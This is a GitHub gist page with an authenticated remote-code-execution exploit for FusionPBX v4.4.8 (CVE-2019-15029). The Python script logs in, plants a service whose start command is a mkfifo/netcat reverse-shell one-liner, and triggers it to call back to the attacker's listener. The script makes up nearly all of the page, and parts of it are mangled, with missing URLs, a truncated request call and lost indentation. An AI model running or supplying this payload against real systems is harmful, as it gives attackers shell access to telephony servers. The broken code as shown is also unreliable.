Skip to content

Instantly share code, notes, and snippets.

Last active June 15, 2020 02:39
Show Gist options
  • Save mhaskar/7a6a804cd68c7fec4f9d1f5c3507900f to your computer and use it in GitHub Desktop.
Save mhaskar/7a6a804cd68c7fec4f9d1f5c3507900f to your computer and use it in GitHub Desktop.
# Exploit Title: FusionPBX v4.4.8 authenticated Remote Code Execution
# Date: 13/08/2019
# Exploit Author: Askar (@mohammadaskar2)
# CVE : 2019-15029
# Vendor Homepage:
# Software link:
# Version: v4.4.8
# Tested on: Ubuntu 18.04 / PHP 7.2
import requests
from requests.packages.urllib3.exceptions import InsecureRequestWarning
import sys
import warnings
from bs4 import BeautifulSoup
# turn off BeautifulSoup and requests warnings
warnings.filterwarnings("ignore", category=UserWarning, module='bs4')
if len(sys.argv) != 6:
print("[~] Usage : ./ url username password ip port")
print("[~] ./ admin p@$$word 1337")
url = sys.argv[1]
username = sys.argv[2]
password = sys.argv[3]
ip = sys.argv[4]
port = sys.argv[5]
request = requests.session()
login_info = {
"username": username,
"password": password
login_request =
login_info, verify=False
if "Invalid Username and/or Password" not in login_request.text:
print("[+] Logged In Sucssfully")
print("[+] Error with creds")
service_edit_page = url + "/app/services/service_edit.php"
services_page = url + "/app/services/services.php"
payload_info = {
# the service name you want to create
# this value contains the payload , you can change it as you want
"service_cmd_start":"rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 1337 >/tmp/f",
}, payload_info, verify=False)
html_page = request.get(services_page, verify=False)
soup = BeautifulSoup(html_page.text, "lxml")
for a in soup.find_all(href=True):
if "PwnedService" in a:
sid = a["href"].split("=")[1]
service_page = url + "/app/services/services.php?id=" + sid + "&a=start"
print("[+] Triggering the exploit , check your netcat !")
request.get(service_page, verify=False)
Copy link

Could you contact me on your

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment